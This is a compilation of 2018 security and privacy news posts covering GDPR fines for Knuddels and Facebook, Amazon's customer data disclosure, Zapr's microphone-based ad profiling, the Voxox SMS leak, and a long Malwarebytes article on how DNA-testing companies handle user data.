“For example, under ICO’s theory people should not be allowed to forward an email or message without having agreement from each person on the original thread. These are things done by millions of people every day on services across the internet.”

Pierluigi Paganini

(Security Affairs – Cambridge Analytica, Facebook)

The post Facebook appeals UK fine in Cambridge Analytica privacy Scandal appeared first on Security Affairs.

Chat app Knuddels fined €20k under GDPR regulation

The case is making the headlines, the German chat platform Knuddels.de (“Cuddles”) has been fined €20,000 for storing user passwords in plain text.

In July hackers breached the systems of the company Knuddels and leaked online its data.

In September, an unknown individual notified Knuddels that crooks published user data of roughly 8,000 members on Pastebin and much more data were leaked via Mega.nz.

Knuddels published a data breach notification and forced users into changing passwords, Knuddels also reported the incident to the Baden-Württemberg data protection authority.

The company duly notified its users and the Baden-Württemberg data protection authority.

“Hello dear ones, 
when you log into the chat, you are currently asked to change your password. 
That’s a precaution. Account data from Knuddels have been published on the internet. Although we are currently not aware of any third-party use, we have temporarily deactivated these accounts for their security.” reads a message published on the company forum.

“We are currently checking whether there is a security vulnerability on the platform. As soon as we have more information, we’ll let you know, of course. For problems and questions please contact our support at community@knuddels.de.
Please use the hint when logging in and change your password.”

According to the German Spiegel Online, hackers leaked over 800,000 email addresses and more than 1.8 million user credentials on Mega.nz.

“the company from Karlsruhe violated the obligation to ensure the security of personal data, informed the Baden-Wuerttemberg data protection commissioner Stefan Brink on Thursday in Stuttgart.” reported Spiegel Online.

“He told the company that after a hacker attack, it turned to the DPA and informed users immediately and extensively about the attack. According to the company, around 808,000 e-mail addresses and 1,872,000 pseudonyms and passwords were stolen by unknown persons and published on the Internet.”

At the time the company had verified 330,000 of the published emails. The chat platform violated GDPR regulation by storing passwords in clear text and for this reason, the regulator imposed its first penalty under the privacy regulation.

The fine is not higher because the company cooperated with the authorities.

“Due to a breach of the data security required by Art. 32 DS-GVO, the penalty office of LfDI Baden-Württemberg imposed a fine of EUR 20,000 by decision of 21.11.2018 against a Baden-Württemberg social media provider and – in constructive Collaboration with the company – ensuring significant improvements in the security of user data.” reads the Baden-Wuerttemberg data protection authority.

“By storing the passwords in clear text, the company knowingly violated its duty to ensure data security in the processing of personal data,” 

The authority’s State Commissioner for Data Protection and Freedom of Information, Stefan Brink, confirmed it avoided impose the highest possible fines, it doesn’t want bankrupting the company.

“The overall financial burden on the company was taken into account in addition to other circumstances,” the authority noted.

“The hacker attack was a real test of stress for Knuddels.” It was immediately clear that the trust of users could only be regained with transparent communication and an immediate noticeable improvement in IT security. “Knuddels is safer than ever.” declared the managing director of Knuddels GmbH & Co. KG, Holger Kujath.

Pierluigi Paganini

(Security Affairs – GDPR, data breach)

The post Chat app Knuddels fined €20k under GDPR regulation appeared first on Security Affairs.

India-Based Zapr Has Developed Tech That Listens To Ambient Sounds Around Users To Build Targeted Ad Profiles, Several Popular Local Services Use Its Tech

Bengaluru-based Zapr Media Labs, which counts Rupert Murdoch-led media group Star and several major local companies including Flipkart (which is now owned by Walmart), music streaming service Saavn, handset maker Micromax as its investors, has developed a tech that listens to ambient sounds around users to build targeted advertising profiles of them, reports news outlet FactorDaily. Zapr does this by using the microphone on the smartphone. Several major services in the country including Chota Bheem games to Dainik Bhaskar (a news outlet) to, likely, even Hotstar (a hugely popular streaming service which launched its service in the US and Canada last year, and which as you may recall, set a global record for most simultaneous views earlier this year) have embedded Zapr's technology into their apps. FactorDaily reports that most of these services are not forthcoming to their customers about what kind of monitoring they are doing. An excerpt from the report: One of the apps that inspired Zapr's founding team was the popular music detection and identification app Shazam. But, its three co-founders saw opportunity in going further. "Instead of detecting music, can we detect all kinds of medium? Can we detect television? Can we detect movies in a theatre? Can we detect video on demand? Can we really build a profile for a user about their media consumption habits... and that really became the idea, the vision we wanted to solve for," Sandipan Mondal, CEO of Zapr Media Labs, said in an interview last week on Thursday. Shorn of jargon, the underlying Zapr tech listens to ambient sounds around you, analyses it, and profiles users based on their media consumption habits. "That data would be very useful in order to recommend the right kind of content and also for brands and advertisers to hopefully reduce the wastage and inefficiencies and make smarter decisions," said Mondal, who co-founded the company in 2012 along with his batchmates from Indian Institute of Management, Ahmedabad (batch of 2010) Deepak Baid and Sajo Mathews. Zapr claims to have the largest media consumption analytics database in India and helps television channels and brands to earn a better bang for their advertising buck. To be sure, advertising -- even with the internet's promise of better targeting -- still is an inaccurate business with proxies, at best, helping measure its return on investment. But, Zapr's tech comes with privacy and data concerns -- lots of it.

Read more of this story at Slashdot.

Adult video game website High Tail Hall hacked; user data stolen

By Waqas

The latest report from breach monitoring website HaveIBeenPwned reveals that in August, popular adult video game website High Tail Hall (HTH) was hacked and private data of about half a million subscribers was stolen. The leaked data includes names, email IDs, and order histories among other details. After a few months, the stolen data was […]

This is a post from HackRead.com Read the original post: Adult video game website High Tail Hall hacked; user data stolen

Black Friday Scams: Shop Safely with These Tips

By Carolina

Black Friday is just around the corner and here’s how you can protect yourself from Black Friday Scams. All the shopaholics around the globe are gearing up for availing the best deal for their bucks. People wait for Black Friday the entire year because, on this day, all the retail outlets offer exclusive discount deals, […]

This is a post from HackRead.com Read the original post: Black Friday Scams: Shop Safely with These Tips

Smashing Security #105: Facebook, Nietzsche, Tesla, and Nicole

Smashing Security #105: Facebook, Nietzsche, Tesla, and Nicole

Tesla takes customer service a step too far, is it a romantic gesture or stalking when you email 246 women called Nicole, and Carole finds herself in a Facebook dilemma.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Jessica Barker.

Amazon data breach: Names & email addresses of customers exposed online

By Carolina

The e-commerce giant Amazon has announced that it has suffered a major data breach in which names and email addresses of its registered customers have been exposed on its website – The incident occurred a few days before Black Friday. The company did not reveal what exactly happened, how many users were impacted or what’s their […]

This is a post from HackRead.com Read the original post: Amazon data breach: Names & email addresses of customers exposed online

Amazon Has Emailed an Unspecified Number of Customers To Inform Them That Their Names and Addresses Were Disclosed by the Website, Blames ‘Technical Error’

If you have received a strange email from Amazon today, you're not alone. A number of customers on Wednesday received an email from the company in which it notes that it "inadvertently disclosed your name and email address due to a technical error." The company confirmed to BetaNews that the emails are genuine, but did not discuss the nature and severity of the technical error and how many customers are impacted. The technical error impacted customers in the United States as well as United Kingdom. It remains unclear if customers elsewhere were affected too. In a statement, the company said, "We have fixed the issue and informed customers who may have been impacted."

Read more of this story at Slashdot.

Amazon UK is notifying a data breach to its customers days before Black Friday

Many readers of the Register shared with the media outlet an email sent from the Amazon UK branch that is notifying them an accidental data leak.

The news is disconcerting, Amazon has suffered a data breach a few days before Black Friday

Many readers of the Register shared with the media outlet an email sent from the Amazon UK branch that is notifying them an accidental data leak.

Amazon UK data leak

Amazon informed its customers that it had “inadvertently disclosed [their] name and email address due to a technical error”.

The messages include an HTTP link to the company website and read:

“Hello,

We’re contacting you to let you know that our website inadvertently disclosed your name and email address due to a technical error. The issue has been fixed. This is not a result of anything you have done, and there is no need for you to change your password or take any other action.

Sincerely, Customer Service”

The Register confirmed that the email is genuine and that was sent by Amazon UK, the press office acknowledged its authenticity.

“We have fixed the issue and informed customers who may have been impacted.” states the press office.

At the time of writing, it is unclear the number of affected customers, whether Amazon had informed the Information Commissioner’s Office.

The company did not disclose technical details of the incident, it is not known the root cause of the incident.

The Register pointed out that not only UK customers are receiving a data breach notification from the Amazon, but people from the US, the Netherlands and South Korea also claim to have received the same message.

Pierluigi Paganini

(Security Affairs – Amazon UK, hacking)

The post Amazon UK is notifying a data breach to its customers days before Black Friday appeared first on Security Affairs.

Beyond governance, risk and compliance: privacy, ethics and trust

We are currently experiencing the fourth industrial revolution (FIR), characterised by a blurred fusion of all things physical, digital and genomic. Each revolution has been accompanied by a privacy legislation wave, linking its governance to the accelerating pace of change. So we find ourselves in the fourth privacy wave, where technological changes outpace regulation – causing consumer fear and digital distrust, and resulting in strong ethical arguments for aggressive improvements in organisations’ privacy practices.

One of those arguments is consumer trust. The 2017 Edelman Trust-Barometer reveals that trust is in crisis around the world. To rebuild trust, Edelman argues that organisations must step outside their traditional roles and work towards a new, more integrated operating model that positions consumers and their trust concerns, at the centre of the organisations’ activities. Organisations should address data protection not just because legislation mandates it, but because empowering customers to control their data engenders trust, creates shared ‘value’, and wins consumer loyalty.

“The trust dynamic between consumers and organisations is on a knife’s edge, with consumers reporting that the values of honesty and integrity have been eroded when it comes to personal data – leaving them feeling cynical and increasingly unwilling to share their data at all”     –        Whose Data Is It Anyway? CIM Survey 2016               

Although many FIR technologies are positively transforming consumer lives, they still depend hugely on large quantities of consumer data, giving rise to increased personal data sharing. A recent study by Columbia Business School found that 75% of consumers are willing to share their data if they trust the brand and are more willing to do so in exchange for benefits, such as reward points and personalisation – but only if it’s on ethical, fair and transparent terms.

Big data = big ethics?

The more data consumers share, the more an organisation can leverage that data for personalisation and innovation, which leads to increased share value. However, according to Gartner, in 2018 half of business ethics violations will occur through improper use of big data analytics. The exponential growth in adblocking over recent years shows how consumers feel about improper use of their data (with Irish and Greek consumers topping the European average, at over 50%).

Just as consumers are known to share more information when they trust an organisation, the opposite is true with distrust. Boston Consulting Group has found that consumers radically reduce data sharing when they distrust an organisation.

Digital ethics and privacy are one of Gartner’s top ten strategic technology trends for 2019.  It writes: “any discussion on privacy must be grounded in the broader topic of digital ethics and the trust of consumers, constituents and employees. Ultimately an organisation’s position on privacy must be driven by its broader position on ethics and trust”.

Doing rights vs doing right

Shifting from privacy to ethics moves the conversation beyond ‘doing rights’ toward ‘doing right’ This ethical approach to data privacy recognises that feasible, useful or profitable does not equal sustainable, and emphasizes accountability over compliance with the letter-of-the-law. In the digital economy, the existence of, and compliance to regulation will no longer be enough to engender consumer trust.

Organisations need to find ways to let their consumers know that they use consumer data in a law-abiding and ethical manner. Organisations that ethically manage data and solve the consumer-privacy-trust equation are more likely to win loyal consumers who pay a premium for their products and services. For example, Lego has placed the protection of children’s data at the heart of its information protection strategy. It limits integration with social media, shows strong corporate responsibility regarding use of customer data by suppliers and partners, and it forbids third-party cookies on websites aimed at children under 13. Apple too, mandates that any new use of its customer data requires sign-off from a committee of three “privacy czars” and a c-suite executive.

Sustaining trust

As data stewards, organisations should understand the dynamics and profile of their consumers and the factors that lead to their trust. Organisations can then communicate their compliance initiatives in a way that can more openly nurture and sustain the trust relationship with the consumer.

This in turn will enable them to better design how and where they should communicate their data protection activities to maximum effect. It also results in a more socially responsible and sustainable privacy protection regime for the fourth privacy legislation wave.

Valerie Lyons is chief operations officer at BH Consulting and IRC PhD Scholar at DCU Business School

The post Beyond governance, risk and compliance: privacy, ethics and trust appeared first on BH Consulting.

What DNA testing kit companies are really doing with your data

Sarah* hovered over the mailbox, envelope in hand. She knew as soon as she mailed off her DNA sample, there’d be no turning back. She ran through the information she looked up on 23andMe’s website one more time: the privacy policy, the research parameters, the option to learn about potential health risks, the warning that the findings could have a dramatic impact on her life.

She paused, instinctively retracting her arm from the mailbox opening. Would she live to regret this choice? What could she learn about her family, herself that she may not want to know? How safe did she really feel giving her genetic information away to be studied, shared with others, or even experimented with?

Thinking back to her sign-up experience, Sarah suddenly worried about the massive amount of personally identifiable information she already handed over to the company. With a background in IT, she knew what a juicy target hers and other customers’ data would be for a potential hacker. Realistically, how safe was her data from a potential breach? She tried to recall the specifics of the EULA, but the wall of legalese text melted before her memory.

Pivoting on her heel, Sarah began to turn away from the mailbox when she remembered just why she wanted to sign up for genetic testing in the first place. She was compelled to learn about her own health history after finding out she had a rare genetic disorder,Ehlers-Danlos syndrome, and wanted to present her DNA for the purpose of further research. In addition, she was on a mission to find her mother’s father. She had a vague idea of who he was, but no clue how to track him down, and believed DNA testing could lead her in the right direction.

Sarah closed her eyes and pictured her mother’s face when she told her she found her dad. With renewed conviction, she dropped the envelope in the mailbox. It was done.

*Not her real name. Subject asked that her name be changed to protect her anonymity.

An informed decision

What if Sarah were you? Would you be inclined to test your DNA to find out about your heritage, your potential health risks, or discover long lost family members? Would you want to submit a sample of genetic material for the purpose of testing and research? Would you care to have a trove of personal data stored in a large database alongside millions of other customers? And would you worry about what could be done with that data and genetic sample, both legally and illegally?

Perhaps your curiosity is powerful enough to sign up without thinking through the consequences. But this would be a dire mistake. Sarah spent a long time weighing the pros and cons of her situation, and ultimately made an informed decision about what to do with her data. But even she was missing parts of the puzzle before taking the plunge. DNA testing is so commonplace now that we’re blindly participating without truly understanding the implications.

And there are many. From privacy concerns to law enforcement controversies to life insurance accessibility to employment discrimination, red flags abound. And yet, this fledgling industry shows no signs of stopping. As of 2017, an estimated 12 million people have had their DNA analyzed through at-home genealogy tests. Want to venture a guess at how many of those read through the 21-page privacy policy to understand exactly how their data is being used, shared, and protected?

Nowadays, security and privacy cannot be assumed. Between hacks of major social media companies and underhanded sharing of data with third parties, there are ways that companies are both negligent of the dangers of storing data without following best security practices and complicit in the dissemination of data to those willing to pay—whether that’s in the name of research or not.

So I decided to dig into exactly what these at-home DNA testing kit companies are doing to protect their customers’ most precious data, since you can’t get much more personally identifiable than a DNA sample. How seriously are these organizations taking the security of their data? What is being done to secure these massive databases of DNA and other PII? How transparent are these companies with their customers about what’s being done with their data?

There’s a lot to unpack with commercial DNA testing—often pages and pages of documents to sift through regarding privacy, security, and design. It can be mind-numbingly difficult to process, which is why so many customers just breeze through agreements and click “Okay” without really thinking about what they’re purchasing.

But this isn’t some app on your phone or software on your computer. It’s data that could be potentially life-changing. Data that, if misinterpreted, could send people into an emotional tailspin, or worse, a false sense of security. And it’s data that, in the wrong hands, could be used for devastating purposes.

In an effort to better educate users about the pros and cons of participating in at-home DNA testing, I’m going to peel back the layers so customers can see for themselves, as clearly as possible, the areas of concern, as well as the benefits of using this technology. That way, users can make informed choices about their DNA and related data, information that we believe should not be taken or given away lightly.

That way, when it’s your turn to stand in front of the mailbox, you won’t be second-guessing your decision.

Area of concern: life insurance

Only a few years ago in the United States, health insurance companies could deny applicants coverage based on pre-existing conditions. While this is thankfully no longer the case, life insurance companies can be more selective about who they cover and how much they charge.

According to the American Counsel for Life Insurers (ACLI), a life insurance company may ask an applicant for any relevant information about his health—and that includes the results of a genetic test, if one was taken. Any indication of health risk could factor into the price tag of coverage here in the United States.

Of course, there’s nothing that forces an individual to disclose that information when applying for life insurance. But the industry relies on honest communication from its customers in order to effectively price policies.

“The basis of sound underwriting has always been the sharing of information between the applicant and the insurer—and that remains today,” said Dr. Robert Gleeson, consultant for the ACLI. “It only makes sense for companies to know what the applicant knows. There must be a level playing field.”

The ACLI believes that the introduction of genetic testing can actually help life insurers better determine risk classification, enabling them to offer overall lower premiums for consumers. However, the fact remains: If a patience receives a diagnosis or if genetic testing reveals a high risk for a particular disease, their insurance premiums go up.

In Australia, any genetic results deemed a health risk can result in not only increased premiums but denial of coverage altogether. And if you thought Australians could get away with a little white lie of omission when applying for life insurance, they are bound by law to disclose any known genetic test results, including those from at-home DNA testing kits.

Area of concern: employment

Going back as far as 1964 to Title VII of the Civil Rights Act, employers cannot discriminate based on race, color, religion, sex, or nationality. Workers with disabilities or other health conditions are protected by the Americans with Disabilities Act, the Rehab Act, and the Family and Medical Leave Act (FMLA).

But these regulations only apply to employees or candidates with a demonstrated health condition or disability. What if genetic tests reveal the potential for disability or health concern? For that, we have GINA.

The Genetic Information Nondiscrimination Act (GINA) prohibits the use of genetic information in making employment decisions.

“Genetic information is protected under GINA, and cannot be considered unless it relates to a legitimate safety-sensitive job function,” said John Jernigan, People and Culture Operations Director at Malwarebytes.

So that’s what the law says. What happens in reality might be a different story. Unfortunately, it’s popular practice for individuals to share their genetic results online, especially on social media. In fact, 23andMe has even sponsored celebrities unveiling and sharing their results. Surely no one will see videos of stars like Mayim Bialik sharing their 23andMe results live and follow suit.

The hiring process is incredibly subjective. It would be almost impossible to point the finger at any employer and say, “You didn’t hire me because of the screenshot I shared on Facebook of my 23andMe results!” It could be entirely possible that the candidate was discriminated against, but in court, any he said/she said arguments will benefit the employer and not the employee.

Our advice: steer clear of sharing the results, especially any screenshots, on social media. You never know how someone could use that information against you.

Area of concern: personally identifiable information (PII)

Consumer DNA tests are clearly best known for collecting and analyzing DNA. However just as important—arguably more so to their bottom line—is the personally identifiable information they collect from their customers at various points in their relationship. Organizations are absorbing as much as they can about their customers in the name of research, yes, but also in the name of profit.

What exactly do these companies ask for? Besides the actual DNA sample, they collect and store content from the moment of registration, including your name, credit card, address, email, username and password, and payment methods. But that’s just the tip of the iceberg.

Along with the genetic and registration data, 23andMe also curates self-reported content through a hulking, 45-minute long survey delivered to its customers. This includes asking about disease conditions, medical and family history, personal traits, and ethnicity. 23andMe also tracks your web behavior via cookies, and stores your IP address, browser preference, and which pages you click on. Finally, any data you produce or share on its website, such as text, music, audio, video, images, and messages to other members, belongs to 23andMe. Getting uncomfortable yet? These are hugely attractive targets for cybercriminals.

Survey questions gather loads of sensitive PII.

Oh, but there’s more. Companies such as Ancestry or Helix have ways to keep their customers consistently involved with their data on their sites. They’ll send customers a message saying, “You disclosed to us you had allergies. We’re doing this study on allergies—can you answer these questions?” And thus even more information is gathered.

Taking a closer look at the companies’ EULAs, you’ll discover that PII can also be gathered from social media, including any likes, tweets, pins, or follow links, as well as any profile information from Facebook if you use it to log into their web portals.

But the information-gathering doesn’t stop there. Ancestry and others will also search public and historical records, such as newspaper mentions, birth, death, and marriage records related to you. In addition, Ancestry cites a frustratingly vague “information collected from third parties” bullet point in their privacy policy. Make of that what you will.

Speaking of third parties, many of them will get a good glimpse of who you are thanks to policies that allow for commercial DNA testing companies to market new products offers from business partners, including producing targeted ads personalized to users based on their interests. And finally, according to the privacy policy shared among many of these sites, DNA testing companies can and do sell your aggregate information to third parties “in order to perform business development, initiate research, send you marketing emails, and improve our services.”

That’s a lot of marketing emails.

One such partner who benefits from the sharing of aggregate information is Big Pharma: at-home DNA testing kits profit by selling user data to pharmaceutical companies for development of new drugs. For some, this might constitute crossing the line; for others, it represents being able to help researchers and those suffering from disease with their data.

“You have to trust all their affiliates, all their employees, all the people that could purchase the company,” said Sarah, our IT girl who elected to participate in 23andMe’s research. “It’s better to take the mindset that there’s potential that any time this could be seen and accessed by anyone. You should always be willing to accept that risk.”

Sadly, there’s already more than enough reason to assume any of this information could be stolen—because it has.

In June 2018, MyHeritage announced that the data of over 92 million users was leaked from the company’s website in October the previous year. Emails and hashed passwords were stolen—thankfully, the DNA and other data of customers was safe. Prior to that, the emails and passwords of 300,000 users from Ancestry.com were stolen back in 2015.

But as these databases grow and more information is gathered on individuals, the mark only becomes juicier for threat actors. “They want to create as broad a profile of the target as possible, not just of the individual but of their associates,” said security expert and founder of Have I Been Pwned Troy Hunt, who tipped off Ancestry about their breach. “If I know who someone’s mother, father, sister, and descendants might be, imagine how convincing a phishing email I could create. Imagine how I could fool your bank.”

Cybercriminals can weaponize data not only to resell to third parties but for blackmail and extortion purposes. Through breaching this data, criminals could dangle coveted genetic, health, and ancestral discoveries in front of their victims. You’ve got a sibling—send money here and we’ll show you who. You’re pre-dispositioned to a disease, but we won’t tell you which one until you send Bitcoin here. Years later, the Ashley Madison breach is still being exploited in this way.

Doing it right: data stored safely and separately

With so much sensitive data being collected by DNA testing companies, especially content related to health, one would hope these organizations pay special attention to securing it. In this area, I was pleasantly surprised to learn that several of the top consumer DNA tests banded together to create a robust security policy that aims to protect user data according to best practices.

And what are those practices? For starters, DNA testing kit companies store user PII and genetic data in physically separating computing environments, and encrypt the data at rest and in transit. PII is assigned a randomized customer identification number for identification and customer support services, and genetic information is only identified using a barcode system.

Security is baked into the design of the systems that gather, store, and disseminate data, including explicit security reviews in the software development lifecycle, quality assurance testing, and operational deployment. Security controls are also audited on a regular basis.

Access to the data is restricted to authorized personnel, based on job function and role, in order to reduce the likelihood of malicious insiders compromising or leaking the data. In addition, robust authentication controls, such as multi-factor authentication and single sign-on, prohibit data flowing in and out like the tides.

For additional safety measures, consumer DNA testing companies conduct penetration testing and offer a bug bounty program to shore up vulnerabilities in their web application. Even more care has been taken with security training and awareness programs for employees, and incident management and response plans were developed with guidance from the National Institute of Standards and Technology (NIST).

In the words of the great John Hammond: They spared no expense.

When Hunt made the call to Ancestry about the breach, he recalls that they responded quickly and professionally, unlike other organizations he’s contacted about data leaks and breaches.

“There’s always a range of ways organizations tend to deal with this. In some cases, they really don’t want to know. They put up the shutters and stick their head in the sand. In some cases, they deny it, even if the data is right there in front of them.”

Thankfully, that does not seem to be the case for the major DNA testing businesses.

Area of concern: law enforcement

At-home DNA testing kit companies are a little vague about when and under which conditions they would hand over your information to law enforcement, using terms such as “under certain circumstances” and “we have to comply with valid requests” without defining the circumstances or indicating what would be considered “valid.” However, they do provide this transparency report that details government requests for data and how they have responded.

Yet, news broke earlier this year that DNA from 23andMe was used to find the Golden State Killer, and it gave consumers collective pause. While putting a serial killer behind bars is worthy cause, the killer was found because a relative of his had participated in 23andMe’s test, and the DNA was a close enough match to DNA found at the original 1970’s crime scenes that they were able to pin him down.

This opens up a can of worms about the impact of commercially-generated genetic data being available to law enforcement or other government bodies. How else could this data be used or even abused by police, investigators, or legislatures? The success of the Golden State Killer arrest could lead to re-opening other high-profile cold cases, or eventually turning to the consumer DNA databases every time there’s DNA evidence found at the scene of a crime.

Because so many individuals have now signed up for commercial DNA tests, odds are 60 percent and rising that, if you live in the US and are of European descent, you can be identified by information that your relatives have made public. In fact, law enforcement soon may not need a family member to have submitted DNA in order to find matches. According to a study published in Science, that figure will soon rise to 100 percent as consumer DNA databases reach critical mass.

What’s the big deal if DNA is used to capture criminals, though? Putting on my tinfoil hat for a second, I imagine a Minority-Report-esque scenario of stopping future crimes or misinterpreting DNA and imprisoning the wrong person. While those scenarios are a little far-fetched, I didn’t have to look too hard for real-life instances of abuse.

In July 2018, Vice reported that Canada’s border agency was using data from Ancestry.com and Familytreedna.com to establish nationalities of migrants and deport those it found suspect. In an era of high tensions on race, nationality, and immigration, it’s not hard to see how genetic data could be used against an individual or family for any number of civil or human rights violations.

Area of concern: accuracy of testing results

While this doesn’t technically fall under the guise of cybersecurity, the accuracy of test results is of concern because these companies are doling out incredibly sensitive information that has the potential to levy dramatic change on peoples’ lives. A March 2018 study in Nature found that 40 percent of results from at-home DNA testing kits were false positives, meaning someone was deemed “at risk” for a category that later turned out to be benign. That statistic is validated by the fact that test results from different consumer testing companies can vary dramatically.

The relative inaccuracy of the test results is compounded by the fact that there’s a lot of room to misinterpret them. Whether it’s learning you’re high risk for Alzheimer’s or discovering that your father is not really your father, health and ancestry data can be consumed without context, and with no doctor or genetic counselor on hand to soften the blow.

In fact, consumer DNA testing companies are rather reticent to send their users to genetic counselors—it’s essentially antithetical to their mission, which is to make genetic data more accessible to their customers.

Brianne Kirkpatrick, a genetic counselor and ancestry expert with the National Society for Genetic Counselors (NSGC), said that 23andMe once had a fairly prominent link on their website for finding genetic counselors to help users understand their results. That link is now either buried or gone. In addition, she mentioned that a one of her clients had to call 23andMe three times until they finally agreed to recommend Kirkpatrick’s counseling services.

“The biggest drawback is people believing that they understand the results when maybe they don’t,” she said. “For example, people don’t understand that the BRCA1 and BRCA2 testing these companies provide is really only helpful if you’re Ashkenazi Jew. In the fine print, it says they look at three variants out of thousands, and these three are only for this population. But people rush to make a conclusion because at a high level it looks like they should be either relieved or worried. It’s complex information, which is why genetic counselors exist in the first place.”

But what’s the symbology?

The data becomes even more messy when you move beyond users of European descent. People of color, especially those of Asian or African descent, have had a particularly hard go of it because they are underrepresented in many companies’ data sets. Often, black, Hispanic, or Asian users receive reports that list parts of their heritage as “low confidence” because their DNA doesn’t sufficiently match the company’s points of reference.

DNA testing companies not only offer sometimes incomplete, inaccurate information that’s easy to misunderstand to their customers, they also provide the raw data output that can be downloaded and then sent to third party websites for even more evaluation. But those sites have not been as historically well-protected as the major consumer DNA testing companies. Once again, the security and privacy of genetic data goes fluttering away into the ether when users upload it, unencrypted and unprotected, to third-party platforms.

Doing it right: privacy policy

As an emerging industry, there’s little in the way of regulation or public policy when it comes to consumer genetic testing. Laboratory testing is bound by Medicare and Medicaid clauses, and commercial companies are regulated by the FDA, but DNA testing companies are a little of both, with the added complexity of operating online. The General Data Protection Regulation (GDPR) launched in May 2018 requires companies to publicly disclose whether they’ve experienced a cyberattack, and imposes heavy fines for those who are not in compliance. But GDPR only applies to companies doing business in Europe.

As far as legal precedent is concerned, the 1990 California Supreme Court case Moore vs. Regents of the University of California found that individuals no longer have claim over their genetic data once they relinquish it for medical testing or other forms of study. So if Ancestry sells your DNA to a pharmaceutical company that then uses your cells to find the cure for cancer, you won’t see a dime of compensation. Bummer.

Despite the many opportunities for data to be stolen, abused, misunderstood, and sold to the highest bidder, the law simply hasn’t caught up to our technology. So the teams developing security and privacy policies for DNA testing companies are doing pioneering work, embracing security best practices and transparency at every turn. This is the right thing to do.

Almost two years ago, founders at Helix started working with privacy experts in order to understand all the key pieces they would need to safeguard—and they recognized that there was a need to form a formal coalition to enhance collaboration across the industry.

Through the Future of Privacy forum, they developed an independent think tank focused on creating public policy that leaders in the industry could follow. They teamed up with representatives from 23andMe, Ancestry, and others to create a set of standards that primarily hammered on the importance of transparency and clear communication with consumers.

“It is something that we are very passionate about,” said Misha Rashkin, Senior Genetic Counselor at Helix, and an active member of developing the shared privacy policy. “We’ve spent our careers explaining genetics to people, so there’s a years-long held belief that transparent, appropriate education—meaning developing policy at an approachable reading level—has got to be a cornerstone of people interacting with their DNA.”

While the privacy coalition strived for easy-to-understand language, the fact remains that their privacy policy is a 21-page document that most people are going to ignore. Rashkin and other team members were aware, so they built more touch points for customers to drill into the data and provide consent, including in-product notifications, emails, blog posts, and infographics delivered to customers as they continued to interact with their data on the platform.

Maps, diagrams, charts, and other visuals help users better understand their data.

After Rashkin and company finalized and published their privacy policy, they turned it into a checklist that partners could use to determine baseline security and privacy standards, and what companies need to do to be compliant. But the work won’t stop there.

“This is just the beginning,” said Elissa Levin Senior Director of Clinical Affairs and Policy at Helix, and a founding member of the privacy policy coalition. “As the industry evolves, we are planning on continuing to work on these standards and progress them. And then we’re actually going out to educate policy makers and regulators and the public in general. We want to help them determine what these policies are and differentiate who are the good players and who are the not-so-good players.”

Biggest area of concern: the unknown

We just don’t know what we don’t know when it comes to technology. When Mark Zuckerberg invented Facebook, he merely wanted an easy way to look at pretty college girls. I don’t think it entered his wildest dreams that his company’s platform could be used to directly interfere with a presidential election, or lead to the genocide of citizens in Myanmar. But because of a lack of foresight and an inability to move quickly to right the ship, we’re now all mired in the mud.

Right now, cybercriminals aren’t searching for DNA on the black market, but that doesn’t mean they won’t. Cybercrime often follows the path of least resistance—what takes the least amount of effort for the biggest payoff? That’s why social engineering attacks still vastly outnumber traditional malware infection vectors.

Because of that, cybercriminals likely believe it’s not worth jumping through hoops to try and break serious encryption for a product (genetic data) that’s not in demand—yet. But as biometrics and fingerprinting and other biological modes of authentication become more popular, I imagine it’s only a matter of time before the wagons start circling.

And yet—does it even matter? Even with all of the red flags exposed, millions of customers have taken the leap of faith because their curiosity overpowers their fear, or the immediate gratification is more satisfying than the nebulous, vague “what ifs” that we in the security community haven’t solved for. With so much data publicly available, do people even care about privacy anymore?

“There are changing sentiments about personal data among generations,” said Hunt. “There’s this entire generation who has grown up sharing their whole world online. This is their new social norm. We’re normalizing the collection of this information. I think if we were to say it’s a bad thing, we’d be projecting our more privacy-conscience viewpoints on them.”

Others believe that, regardless of personal feelings on privacy, this technology isn’t going away, so we—security experts, consumers, policy makers, and genetic testers alike—need to address its complex security and privacy issues head on.

“Privacy is such a personal matter. And while there may be trends, that doesn’t necessarily speak to an entire generation. There are people who are more open and there are people who are more concerned,” said Levin.  “Whether someone is concerned or not, we are going to set these standards and abide by these practices because we think it’s important to protect people, even if they don’t think it’s critical. Fundamentally, it does come down to being transparent and helping people be aware of the risk to at least mitigate surprises.”

Indeed, whether privacy is personally important to you or not, understanding which data is being collected from where and how companies benefit from using your data makes you a more well-informed consumer.

Don’t just check that box. Look deeper, ask questions, and do some self-reflection about what’s important to you. Because right now, if someone steals your data, you might have to change a few passwords or cancel a couple credit cards. You might even be embroiled in identity theft hell. But we have no idea what the consequences will be if someone steals your genetic code.

Laws change and society changes. What’s legal and sanctioned now may not be in the future. But that data is going to be around a long time. And you cannot change your DNA.

The post What DNA testing kit companies are really doing with your data appeared first on Malwarebytes Labs.

Cloud communication firm exposes millions of sensitive text messages to public access

By Waqas

There’s bad news for those who rely upon SMS-based 2FA authentication. A Berlin-based security researcher Sébastien Kaul has revealed that Voxox exposed a huge database containing tens of millions of text messages by storing it on an unprotected server. The VOIP and Cloud communication for SMS and voice services provider firm, Voxox, has exposed sensitive […]

This is a post from HackRead.com Read the original post: Cloud communication firm exposes millions of sensitive text messages to public access

The PCLOB Needs a Director

The US Privacy and Civil Liberties Oversight Board is looking for a director. Among other things, this board has some oversight role over the NSA. More precisely, it can examine what any executive-branch agency is doing about counterterrorism. So it can examine the program of TSA watchlists, NSA anti-terrorism surveillance, and FBI counterterrorism activities.

The PCLOB was established in 2004 (when it didn't do much), disappeared from 2007-2012, and reconstituted in 2012. It issued a major report on NSA surveillance in 2014. It has dwindled since then, having as few as one member. Last month, the Senate confirmed three new members, including Ed Felten.

So, potentially an important job if anyone out there is interested.

iKeyMonitor Spy App for iPhone and Android: Best Remote Monitoring Tool

By Carolina

Nowadays, it has become a social rule to own a smartphone, and humanity has become more dependent on social networks than ever before. We need to be connected to the Internet at all times and we publish our most private and personal thoughts there. Even in social events people spend their time constantly checking their […]

This is a post from HackRead.com Read the original post: iKeyMonitor Spy App for iPhone and Android: Best Remote Monitoring Tool

Privacy laws do not understand human error

In a world of increasingly punitive regulations like GDPR, the combination of unstructured data and human error represents one of the greatest risks an organization faces. Understanding the differences between unstructured and structured data – and the different approaches needed to secure it – is critical to achieve compliance with the many data privacy regulations that businesses in the U.S. now face. Structured data is comprised of individual elements of information organized to be accessible, … More

The post Privacy laws do not understand human error appeared first on Help Net Security.

